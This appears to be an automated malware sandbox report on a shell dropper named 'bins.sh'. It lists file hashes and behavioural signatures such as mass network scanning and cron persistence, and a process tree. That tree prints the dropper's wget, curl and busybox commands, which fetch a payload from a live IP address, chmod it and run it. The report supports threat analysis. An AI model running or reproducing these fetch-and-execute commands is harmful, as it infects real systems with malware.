Analysis
-
max time kernel
149s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 13:46
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
db199d59ba08e033c581aecba2219c42
-
SHA1
469f462f64f7554cfb806ffec3c825e6b2d2cd61
-
SHA256
483b8ef88573fcd07bcbebbd9493eb7821f86e77cd499adcb534b5f9fee9f5f3
-
SHA512
03ca54d3480cdd7c3a98c177eb51675650624e33bb1bc55876c3eb44ab24749530df58c439a1f1dc88d62cb6d2b12b4ea885ac0e896d0aa747f86a2a5959a04c
-
SSDEEP
192:nSWLaKmTJJo+oMYFCi/AJZwn7mCMYFCikJZwn7XSWLaKTL:QTJJo+eKyL
Malware Config
Signatures
-
Contacts a large (2164) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 685 chmod -
Executes dropped EXE 1 IoCs
Processes:
DgY18nfKIcdThLn44egYEVQOYhsN0XsUVYioc pid process /tmp/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY 686 DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY -
Renames itself 1 IoCs
Processes:
DgY18nfKIcdThLn44egYEVQOYhsN0XsUVYpid process 687 DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.Xa5HJk crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Processes:
DgY18nfKIcdThLn44egYEVQOYhsN0XsUVYdescription ioc process File opened for reading /proc/652/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/902/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/1018/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/1026/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/804/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/899/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/764/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/913/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/941/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/958/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/984/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/1016/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/820/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/846/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/919/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/963/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/1014/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/602/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/771/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/777/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/953/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/1021/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/772/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/886/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/939/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/988/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/115/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/607/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/735/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/813/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/884/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/951/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/1027/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/734/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/753/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/762/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/926/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/983/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/24/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/10/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/831/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/928/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/1004/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/219/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/802/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/868/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/898/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/978/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/986/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/998/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/871/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/894/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/911/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/112/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/144/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/718/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/739/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/782/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/938/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/22/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/706/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/747/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/759/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY File opened for reading /proc/816/cmdline DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc process File opened for modification /tmp/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY wget File opened for modification /tmp/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY curl File opened for modification /tmp/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
/usr/bin/wgetwget http://87.120.84.230/bins/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY2⤵
- Writes file to tmp directory
PID:657 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:680 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY2⤵
- Writes file to tmp directory
PID:684 -
/bin/chmodchmod 777 DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY2⤵
- File and Directory Permissions Modification
PID:685 -
/tmp/DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY./DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:686 -
/bin/shsh -c "crontab -l"3⤵PID:688
-
/usr/bin/crontabcrontab -l4⤵PID:689
-
/bin/shsh -c "crontab -"3⤵PID:690
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:691 -
/bin/rmrm DgY18nfKIcdThLn44egYEVQOYhsN0XsUVY2⤵PID:705
-
/usr/bin/wgetwget http://87.120.84.230/bins/EPTMqMUa11TlOYpKaU3Qr0OvF12s1xDC8Y2⤵PID:709
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD5c39661a23c8e1b4c5c9684e688288aa1
SHA169cf181f1ec9cad4478a35739cd75410e5f3a1e0
SHA256de4c26e11a7c0acf641872635c6962c52f9d1d3797db33e03bb63be6fa3326a7
SHA51202512ffa6b2b44839bf10ba753cd43131745d6b02ab2da30b18b86ac904a3c26f082c0a7a75ba184efaca14193732c0837d48e0811a659ce7e787ddafaa0bcdc